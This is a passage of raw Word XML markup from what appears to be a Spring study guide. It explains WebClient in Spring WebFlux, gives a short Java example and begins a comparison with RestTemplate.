          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JSON</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XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or any other data formats. It integrates with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jackson</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Gson</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for JSON processing and supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JAXB</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for XML processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153342C1"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Integration with Reactive Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A94934B"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Since Spring WebFlux is built on reactive programming concepts, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows the client-side HTTP interactions to be fully integrated into a reactive stack. This ensures that your entire system remains non-blocking and can handle many concurrent HTTP requests without thread contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E39264"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rror Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1573E09F"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ebClient supports built-in error handling. You can easily define error handling logic (such as retry logic or fallbacks) when HTTP requests fail, making it robust for production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197CE285"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treaming Responses</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670AC8FA"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WebClient supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming responses</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. For large responses or files (like downloading large data), WebClient can read the data in chunks without blocking the application, making it efficient for such use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CD15A9"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ross-Service Communication in Microservices</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC4AB05"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WebClient is often used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>microservices architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for making non-blocking HTTP calls to other services. Its asynchronous and non-blocking nature makes it suitable for communicating with other microservices efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE1A240"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 of Using WebClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A5D60"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web.reactive.function.client.WebClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197CE379"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F6A41" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210C1C87"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WebClientExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AF2382"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F22279"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ebClient webClient = WebClient.create("http://localhost:8080");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6121332D" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B54087"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Mono&lt;String&gt; response = webClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31796C8F"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uri("/some-endpoint")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A468AE9"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rieve()  // initiate the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4BC1C5"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bodyToMono(String.class);  // convert response to Mono&lt;String&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38557417" w14:textId="77777777" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415361CF"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Subscribe to execute the request asynchronously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DC18AB"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sponse.subscribe(System.out::println);  // Print the response when it is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB2320"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246F55A6"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5E357EAB"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Key Features of WebClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45495D42"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Asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Makes non-blocking requests, allowing other tasks to proceed while waiting for the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8B7F79"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Fluent API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The builder pattern makes it easy to configure and chain method calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A61E46"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upports multiple formats</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It supports multiple response formats (JSON, XML, etc.) through built-in converters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E42AB0"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rror Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides rich error handling capabilities with the use of reactive operators like onErrorResume, onErrorMap, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534671CF"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Timeout Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows setting timeouts for the requests, handling cases where the server takes too long to respond.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5089042A"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treaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It can handle large response bodies by streaming them to avoid memory overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3371A3AA"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Use Cases for WebClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A07385"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Microservices communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For making HTTP requests to other services in a microservices architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7C8917"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Interacting with external APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Calling third-party RESTful services in a reactive and non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A3EDAE"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Handling large data streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Fetching large files or continuous data streams like log files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E1FA24"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ctive Web Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When building a web application with Spring WebFlux that needs to make HTTP calls in a non-blocking way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3245E6F5"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omparison with RestTemplate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA2178"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Blocking I/O, generally used in traditional Spring MVC applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2C89F"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Non-blocking, used in reactive Spring WebFlux applications for handling asynchronous HTTP calls efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F72EF0" w14:textId="77777777" w:rsidR="00E32D56"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32FBDE7">
          <v:rect id="_x0000_i2295" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D0895A"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n summary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a key component in Spring WebFlux for making </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking HTTP requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It plays a critical role in building </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive, scalable applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by allowing asynchronous communication with other systems or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1921E2"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868FD06">
          <v:rect id="_x0000_i2296" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C218D1F" w14:textId="30DD9D29" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="00281739" w:rsidP="00163F3B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="507" w:name="_Toc196307987"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="004A4102" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">WebClient </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="004A4102" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> RestTemplate</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="507"/>
    </w:p>
    <w:p w14:paraId="32ECE9F1" w14:textId="6A78D588" w:rsidR="00E32D56" w:rsidRPr="00B13F85" w:rsidRDefault="00E32D56"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he main differences between </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</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RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring are related to their nature (synchronous vs asynchronous), usage context, and the way they handle HTTP requests. Here's a detailed comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D79F03"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 Blocking vs Non-Blocking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFC1578"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D0A591"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Blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> approach for making HTTP requests. The thread that calls RestTemplate is blocked until the response is received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C60A7"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xample: When you make an HTTP request using RestTemplate, it will block the thread until it gets the response, which can lead to resource wastage, especially in high-concurrency situations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4AA40"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4534E"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Non-Blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</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reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> programming, meaning that the thread is not blocked while waiting for the response. The operation returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (which are reactive types in Project Reactor), and you can continue with other tasks while waiting for the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BCD37D"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xample: You can use WebClient to perform HTTP calls without blocking the thread, allowing other tasks to proceed concurrently, improving performance and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170A61DE"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2. Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04593414"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stTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2FA01B"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Primarily used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traditional Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications that do not require asynchronous processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571E1887"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Used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP requests, where blocking behavior is acceptable, and the application is not handling large numbers of concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389FE276"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
